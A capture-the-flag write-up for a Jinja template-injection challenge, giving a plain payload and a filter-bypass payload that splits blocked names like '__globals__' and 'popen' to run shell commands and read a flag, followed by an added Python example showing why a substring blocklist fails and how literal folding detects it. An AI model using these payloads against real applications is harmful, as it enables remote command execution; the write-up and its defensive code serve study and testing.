jinja ninja v2

Solved by: Hanxoe

You think you are worthy enough? i dont think sooooooo :v

10.4.79.68:20008

author: anarchistx

Alright, we're diving back into a Jinja challenge, and this time the filters are trickier!

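The challenge filters several strings that we need to bypass: __globals__, __builtins__, __import__, and the popen() function call.

The filter matches those names as literal strings, so we can split each name into two string literals that Jinja joins at render time, and reach each attribute through subscript syntax instead of a dot. We need to transform this simple payload: {{request.application.__globals__.__builtins__.__import__('os').popen('ls ../').read()}} into a bypass payload, such as: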

{{ request.application['__glo' + 'bals__']['__bui' + 'ltins__']['__im' + 'port__']('os')['po' + 'pen']('cat ../flag.txt')['re' + 'ad']() }}

And just send!!!🔫🔫

compit{j1nj4_1nj3ct10n_15_d4ng3r0u5_4nd_fun}
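
Why the split payload gets through, and what a check that survives it looks like, as an added example that is not part of the original write-up or the challenge's code. It assumes the filter is a verbatim substring blocklist over the four listed names (the real filter is not shown on the page); naive_filter_allows, fold_literals and blocked_names are hypothetical helper names.

```python
import re

# Assumption: the challenge's filter is a verbatim substring blocklist over the
# four names the write-up lists. The real filter code is not shown on the page.
BLOCKED = ("__globals__", "__builtins__", "__import__", "popen")

# Both payloads are copied from the write-up.
PLAIN = ("{{request.application.__globals__.__builtins__"
         ".__import__('os').popen('ls ../').read()}}")
SPLIT = ("{{ request.application['__glo' + 'bals__']['__bui' + 'ltins__']"
         "['__im' + 'port__']('os')['po' + 'pen']('cat ../flag.txt')"
         "['re' + 'ad']() }}")


def naive_filter_allows(template: str) -> bool:
    """Hypothetical blocklist: allow unless a blocked name appears verbatim."""
    return not any(name in template for name in BLOCKED)


# Two quoted literals joined by '+', e.g. '__glo' + 'bals__'.
_CONCAT = re.compile(r"""(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3""")


def fold_literals(template: str) -> str:
    """Join constant string concatenations until none are left."""
    def join(match):
        quote = match.group(1)
        return quote + match.group(2) + match.group(4) + quote

    previous = None
    while previous != template:
        previous, template = template, _CONCAT.sub(join, template)
    return template


def blocked_names(template: str) -> list:
    """Blocked names present once concatenated literals are folded."""
    folded = fold_literals(template)
    return [name for name in BLOCKED if name in folded]


if __name__ == "__main__":
    print("naive filter allows PLAIN:", naive_filter_allows(PLAIN))
    print("naive filter allows SPLIT:", naive_filter_allows(SPLIT))
    print("names found after folding:", blocked_names(SPLIT))
```

Folding literals only closes the one gap shown in this write-up, so treat it as detection or logging logic. The durable fix is to keep user input out of the template source (pass it in as a variable) or to render untrusted templates with jinja2.sandbox.SandboxedEnvironment.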